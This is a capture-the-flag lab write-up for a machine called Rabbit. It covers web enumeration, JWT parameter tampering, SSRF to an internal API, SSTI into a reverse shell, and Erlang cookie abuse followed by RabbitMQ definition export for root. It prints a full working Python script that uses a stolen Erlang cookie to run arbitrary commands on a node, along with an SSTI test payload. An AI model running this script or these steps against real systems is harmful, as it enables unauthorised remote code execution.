Demonstrate your web application testing skills and the basics of Linux to escalate your privileges.
Into
Hello Everyone today we have new Rabbit machine Let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBXuyWp8m+y9taS8DGHe95YNOsKZ1/LCOjNlkzNjrnqGS1sZuQV7XQT9WbK/yWAgxZNtBHdnUT6uSEZPbfEUjUw=
| 256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILcGp6ztslpYtKYBl8IrBPBbvf3doadnd5CBsO+HFg5M
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://cloudsite.thm/
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp open epmd syn-ack ttl 63 Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ rabbit: 25672
25672/tcp open unknown syn-ack ttl 63
So we have unusual port open but first let's enumerate the web application.
Do not forgot to change the hosts file as the nmap results shows.
Storage.cloudsite.thm is the login require subdomain.
Going thourgh the web application nothing seems intresting but the login page shows something intresting.
It gives this message when we signup and login. And also if we check the application tab in the dev tool we can see JWT token set.
So let's check what this JWT contain. using this website.
So after 10H of enumerate and thinking i found it with some hints. So when we send the signup request we can add additional parameter to the request.
So when we create the account now we login.
Now we can just use the same JWT to access the active routes.
SSRF.
So this page here feature some ways to upload files one of the ways is using URL so the first thing i though about was SSRF.
One thing we can not access yet is this.
So let's use the SSRF to access it. But first we need to know on what port does Express run. we can either enumerate the whole inner ports or we just can google it. I did both and the port was 3000.
After we Download from the provided URL we can see this message.
We can see these endpoints the most intresting and we have not seen before was the chat bot message let use Burp to check it.
So after we capture the request and change the method into POST we will get and error.
I have suffer from this error a lot but i miss something important in the docs it says that all request need to be Json and here we only need to add the content type as json.
Content-Type: application/json
So we can see the error message says It require username let's provide one.
SSTI && Shell as azrael
We can say it load our name into html so it most likely to be SSTI. Let's use simple payload to check
{{7*3}}
as we can see our payload has been evaluated meaning it vulnarble to SSTI.
This reverse shell i have taken from jaxafed shout out for him great player.
with that we just change to out info and we shall get shell on the system.
Shell as rabbitmq
So once we inside the machine we can start looking for the cookies for the cluster from the NMAP results in order to connect to it we need a cookies we can simple find it here.
RabbitMQ is a message broker software that facilitates communication between different parts of applications, allowing them to send and receive messages from each other. It's often used in distributed systems to manage node interactions, ensuring that messages like tasks and data are reliably passed from sender to receiver. This improves system scalability, reliability, and architecture flexibility.
After a while of search i came a across this repo which has a lot of tools to break and enumerate Erlang.
Here we can find a way of gaining shell using our cookies. Which called shell-erldp.py
I got a lot of issues when running it. But using simple AI i was able to resolve them.
#!/usr/bin/env python2
from struct import pack, unpack
from cStringIO import StringIO
from socket import socket, AF_INET, SOCK_STREAM, SHUT_RDWR
from hashlib import md5
from binascii import hexlify, unhexlify
from random import choice
from string import ascii_uppercase
import sys
import argparse
import erlang as erl
def rand_id(n=6):
return ''.join([choice(ascii_uppercase) for c in range(n)]) + '@nowhere'
parser = argparse.ArgumentParser(description='Execute shell command through Erlang distribution protocol')
parser.add_argument('target', action='store', type=str, help='Erlang node address or FQDN')
parser.add_argument('port', action='store', type=int, help='Erlang node TCP port')
parser.add_argument('cookie', action='store', type=str, help='Erlang cookie')
parser.add_argument('--verbose', action='store_true', help='Output decode Erlang binary term format received')
parser.add_argument('--challenge', type=int, default=0, help='Set client challenge value')
parser.add_argument('cmd', default=None, nargs='?', action='store', type=str, help='Shell command to execute, defaults to interactive shell')
args = parser.parse_args()
name = rand_id()
sock = socket(AF_INET, SOCK_STREAM, 0)
assert(sock)
sock.connect((args.target, args.port))
def send_name(name):
FLAGS = (
0x7499c +
0x01000600 # HANDSHAKE_23|BIT_BINARIES|EXPORT_PTR_TAG
)
return pack('!HcQIH', 15 + len(name), 'N', FLAGS, 0xdeadbeef, len(name)) + name
sock.sendall(send_name(name))
data = sock.recv(5)
assert(data == '\x00\x03\x73\x6f\x6b')
data = sock.recv(4096)
(length, tag, flags, challenge, creation, nlen) = unpack('!HcQIIH', data[:21])
assert(tag == 'N')
assert(nlen + 19 == length)
challenge = '%u' % challenge
def send_challenge_reply(cookie, challenge):
m = md5()
m.update(cookie)
m.update(challenge)
response = m.digest()
return pack('!HcI', len(response)+5, 'r', args.challenge) + response
sock.sendall(send_challenge_reply(args.cookie, challenge))
data = sock.recv(3)
if len(data) == 0:
print('wrong cookie, auth unsuccessful')
sys.exit(1)
else:
assert(data == '\x00\x11\x61')
digest = sock.recv(16)
assert(len(digest) == 16)
print('[*] authenticated onto victim')
# Protocol between connected nodes is based on pre 5.7.2 format
def erl_dist_recv(f):
hdr = f.recv(4)
if len(hdr) != 4: return
(length,) = unpack('!I', hdr)
data = f.recv(length)
if len(data) != length: return
# Remove 0x70 from the head of the stream
data = data[1:]
print("Received data to parse: %s" % data) # Logging the raw data
while data:
try:
(parsed, term) = erl.binary_to_term(data)
if parsed <= 0:
print('Failed to parse Erlang term, raw data: %s' % data)
break
except erl.ParseException as e:
print('ParseException occurred: %s. Data: %s' % (str(e), data))
break
print("Parsed term: %s" % str(term)) # Log parsed term for debugging
yield term
data = data[parsed:]
def encode_string(name, type=0x64):
return pack('!BH', type, len(name)) + name
def send_cmd_old(name, cmd):
data = (unhexlify('70836804610667') +
encode_string(name) +
unhexlify('0000000300000000006400006400037265') +
unhexlify('7883680267') +
encode_string(name) +
unhexlify('0000000300000000006805') +
encode_string('call') +
encode_string('os') +
encode_string('cmd') +
unhexlify('6c00000001') +
encode_string(cmd, 0x6b) +
unhexlify('6a') +
encode_string('user'))
return pack('!I', len(data)) + data
def send_cmd(name, cmd):
# REG_SEND control message
ctrl_msg = (6,
erl.OtpErlangPid(erl.OtpErlangAtom(name), '\x00\x00\x00\x03', '\x00\x00\x00\x00', '\x00'),
erl.OtpErlangAtom(''),
erl.OtpErlangAtom('rex'))
msg = (
erl.OtpErlangPid(erl.OtpErlangAtom(name), '\x00\x00\x00\x03', '\x00\x00\x00\x00', '\x00'),
(
erl.OtpErlangAtom('call'),
erl.OtpErlangAtom('os'),
erl.OtpErlangAtom('cmd'),
[cmd],
erl.OtpErlangAtom('user')
))
new_data = '\x70' + erl.term_to_binary(ctrl_msg) + erl.term_to_binary(msg)
print("Sending command data: %s" % new_data) # Log the command being sent
return pack('!I', len(new_data)) + new_data
def recv_reply(f):
terms = [t for t in erl_dist_recv(f)]
if args.verbose:
print('\nReceived terms: %r' % (terms))
if len(terms) < 2:
print("Error: Unexpected number of terms received")
return None
answer = terms[1]
if len(answer) != 2:
print("Error: Unexpected structure in answer")
return None
return answer[1]
if not args.cmd:
while True:
try:
cmd = raw_input('%s:%d $ ' % (args.target, args.port))
except EOFError:
print('')
break
sock.sendall(send_cmd(name, cmd))
reply = recv_reply(sock)
if reply:
sys.stdout.write(reply)
else:
print("Failed to receive a valid reply")
else:
sock.sendall(send_cmd(name, args.cmd))
reply = recv_reply(sock)
if reply:
sys.stdout.write(reply)
else:
print("Failed to receive a valid reply")
print('[*] disconnecting from victim')
sock.close()
Using this code and the cookies we found we can run this command to get poor shell.
The base64 here is just to ficilitate the data transfer.
With that we just need to setup a listener and we shall get our shell.
Shell as Root.
After we get shell we can use rabbitmqctl to execute more command. We can also find a web panel for Rabbit MQ. which run on port 15672. We can use port forwarding via ssh. We just need to create ssh key and we should be ready to go. After creating the ssh key we can use this command.
After that we can access our localhost on port 3000 we shall find it there. It require login but we do not have creds. Since we have permission to execute rabbitmqctl we can create user for us as admin user. But it will not work as it gonna give us this error.
We also will see admin navigation when we get there we can see a message says that the root password same as the root password here and we shall not crack sha256. To find the root password we can export the schema for the user we can find more info here.
This command shoud give us the exported schema.
rabbitmqctl export_definitions ./def
cat ./def
Now that we have this let's try to crack it.
I sepnd some time but i cloud not find it so i check 0xbob writeUp i found simple python code to crack it.
